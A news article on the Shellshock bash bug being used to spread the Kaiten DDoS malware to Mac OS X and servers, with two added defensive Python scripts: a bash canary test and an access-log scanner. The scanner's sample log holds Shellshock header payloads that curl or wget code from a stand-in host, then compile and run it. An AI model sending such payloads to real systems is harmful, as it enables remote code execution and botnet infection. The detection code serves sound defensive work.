Hackers are exploiting the Shellshock bug to infect numerous systems, including Apple Mac OS X, with a distributed denial-of-service (DDoS) malware known as Kaiten.
Security researchers from Trend Micro reported uncovering the campaign in a blog post, warning that it has the potential to inflict devastating DDoS attacks.
“We found that one of the payloads of Bash vulnerabilities, which we detect as TROJ_BASHKAI.SM, downloaded the source code of Kaiten malware, which is used to carry out denial-of-service attacks,” read the post.
“Kaiten is old IRC-controlled DDoS malware and, as such, there is a possibility that the attackers employed Shellshock to revive its old activities like DDoS attacks to target organisations.”
Discovered earlier in September, Shellshock is a critical vulnerability in the Bash shell used by Unix and Unix-like systems.
Trend Micro listed the new attack’s ability to infect Mac OS systems as particularly troubling, highlighting it as evidence that hackers are using Shellshock to expand the victim base of their campaigns.
“Typically, systems infected with Shellshock payloads become a part of their botnet, and therefore can be used to launch DDoS attacks. In addition, the emergence of a downloaded file that targets Mac OS clearly shows that attackers are broadening their target platform,” the security firm said.
Trend Micro added that the threat is doubly dangerous, as Apple had mistakenly told its users that most of them should be safe by default.
“Users who have configured their systems to enable the Advanced Unix Services are still affected by this vulnerability,” read the post.
“The Advanced Unix services enable remote access via Secure Shell, which offers ease of access to system or network administrators in managing their servers. This service is most likely enabled for machines used as servers such as web servers, which are the common targets of Shellshock attacks.”
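The caveat above boils down to two questions an administrator of an OS X box can answer locally: is remote access over SSH switched on, and does the installed bash still honour commands smuggled in after an imported function definition? The script below is an added example, not code from Trend Micro or Apple. It assumes that OS X reports the SSH setting via `systemsetup -getremotelogin` as a line reading "Remote Login: On" or "Remote Login: Off" (the sample output in the test is constructed), and it uses the widely published bash canary: a variable whose value is an empty function body followed by a harmless `echo`. A patched bash stops parsing after the function body, so the marker text never appears; an unpatched bash prints it.

```python
"""Shellshock exposure triage for a host that may have Remote Login enabled.

Added example (not from the original article). Two independent checks:
  1. parse `systemsetup -getremotelogin` output (format assumed, see lead-in);
  2. run the bash canary and look for the marker in stdout.
"""
import shutil
import subprocess

# Constructed, harmless marker: its presence in output means bash executed
# text that followed the function body of an environment variable.
CANARY_MARKER = "shellshock-canary-marker"


def remote_login_enabled(systemsetup_output):
    """True if the systemsetup text reports Remote Login as on.

    Assumes a line of the form 'Remote Login: On' / 'Remote Login: Off'.
    """
    for line in systemsetup_output.splitlines():
        if line.strip().lower().startswith("remote login:"):
            return line.split(":", 1)[1].strip().lower() == "on"
    return False


def bash_imports_trailing_commands(bash_path=None, timeout=10):
    """Return True if bash runs commands appended to an imported function
    definition (unpatched), False if it is patched, None if no bash exists."""
    bash = bash_path or shutil.which("bash")
    if bash is None:
        return None
    # The variable value is a function definition followed by an extra command.
    env = {
        "PATH": "/usr/bin:/bin",
        "probe": "() { :; }; echo " + CANARY_MARKER,
    }
    try:
        proc = subprocess.run(
            [bash, "-c", "echo probe-ran"],
            env=env, capture_output=True, text=True, timeout=timeout,
        )
    except (OSError, subprocess.SubprocessError):
        return None
    return CANARY_MARKER in proc.stdout


def triage(systemsetup_output, bash_path=None):
    """Combine both checks into a single verdict string."""
    ssh_on = remote_login_enabled(systemsetup_output)
    vulnerable = bash_imports_trailing_commands(bash_path)
    if vulnerable is None:
        return "unknown: no bash found"
    if vulnerable and ssh_on:
        return "exposed: Remote Login on and bash unpatched"
    if vulnerable:
        return "unpatched bash, Remote Login off"
    return "bash patched"


if __name__ == "__main__":
    # On a real Mac, feed in the output of `systemsetup -getremotelogin`.
    print(triage("Remote Login: On"))
```

Run it with the real `systemsetup` output on the host in question; on any system whose bash has the function-import fix, the canary check returns False and the verdict is "bash patched".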
Apple released security patches to plug Shellshock for its OS X Mavericks, Lion and Mountain Lion operating systems in September.
The Trend Micro researchers added that IT managers should be on guard for the attack, as its infection routine is designed to evade detection.
“When it connects to http://www[dot]computer-services[dot]name/b[dot]c, it downloads the Kaiten source code, which is then compiled using the common gcc compiler. This means that once connected to the URL, it won’t immediately download an executable file,” explained the researchers.
“This routine could also be viewed as an evasion technique as some network security systems filter out non-executable files from scanning, due to network performance concerns. Systems configured this way may skip the scanning of the source code because it’s basically a text file.”
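Because the evasion described above works at the file-scanning layer, the more reliable place to catch this campaign is the request that delivers the payload: web servers, the common targets named earlier in the post, copy HTTP header values into environment variables, which is where the function-definition trick lands. The scanner below is an added example, not Trend Micro's code. It walks combined-format access log lines (all constructed, with the `.invalid` TLD in place of the defanged domain in the article), flags any header value that opens with a function definition followed by further commands, and then notes whether the embedded command fetches a source file and invokes a compiler, the compile-on-host pattern the researchers describe.

```python
"""Flag Shellshock-style payloads in web access logs and classify them.

Added example (not from the original article). All log lines are constructed.
"""
import re
from dataclasses import dataclass, field

# A function definition in an environment value, followed by extra commands.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)")
# URLs inside the smuggled command (stop at whitespace, quotes, shell metachars).
URL_RE = re.compile(r"https?://[^\s\"'<>;|&\\]+")
# Source files a scanner configured to skip non-executables would let through.
SOURCE_EXT = (".c", ".cc", ".cpp", ".h")
COMPILER_RE = re.compile(r"\b(gcc|cc|clang|make)\b")


@dataclass
class Finding:
    line_no: int
    client: str
    command: str
    urls: list = field(default_factory=list)
    source_fetch: bool = False
    compile_on_host: bool = False


def scan_log(lines):
    """Return one Finding per log line carrying a Shellshock-style payload."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = SHELLSHOCK_RE.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]          # first field of combined log format
        cmd = m.group("cmd").rstrip('"')
        urls = URL_RE.findall(cmd)
        findings.append(Finding(
            line_no=n, client=client, command=cmd, urls=urls,
            source_fetch=any(u.lower().endswith(SOURCE_EXT) for u in urls),
            compile_on_host=bool(COMPILER_RE.search(cmd)),
        ))
    return findings


def risk_label(f):
    """Short triage label for a finding."""
    if f.source_fetch and f.compile_on_host:
        return "compile-on-host: source download plus compiler invocation"
    if f.urls:
        return "remote download"
    return "inline command"


# Constructed sample: two benign requests and two payload-bearing User-Agents.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2014:12:01:03 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2014:12:02:10 +0000] "GET /cgi-bin/status HTTP/1.1" 200 41 "-" '
    '"() { :; }; /bin/bash -c \\"curl -o /tmp/b.c http://malware.invalid/b.c; gcc -o /tmp/b /tmp/b.c; /tmp/b\\""',
    '198.51.100.9 - - [10/Oct/2014:12:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 41 "-" '
    '"() { :; }; /bin/bash -c \\"wget http://malware.invalid/x.sh\\""',
    '192.0.2.4 - - [10/Oct/2014:12:03:00 +0000] "GET /about HTTP/1.1" 200 300 "-" "curl/7.37.0"',
]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no} from {f.client}: {risk_label(f)} -> {f.urls}")
```

The label is what matters operationally: a finding tagged compile-on-host tells you the fetched file would have looked like plain text to a scanner that skips non-executables, so the host itself (look for a fresh compiler run and its output binary) rather than the network sensor is where to confirm infection.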
The Kaiten attack is one of many recently discovered campaigns using Shellshock. Researchers from FireEye caught hackers exploiting the Shellshock Bash vulnerability to infect enterprise Network Attached Storage systems with malware at the end of September.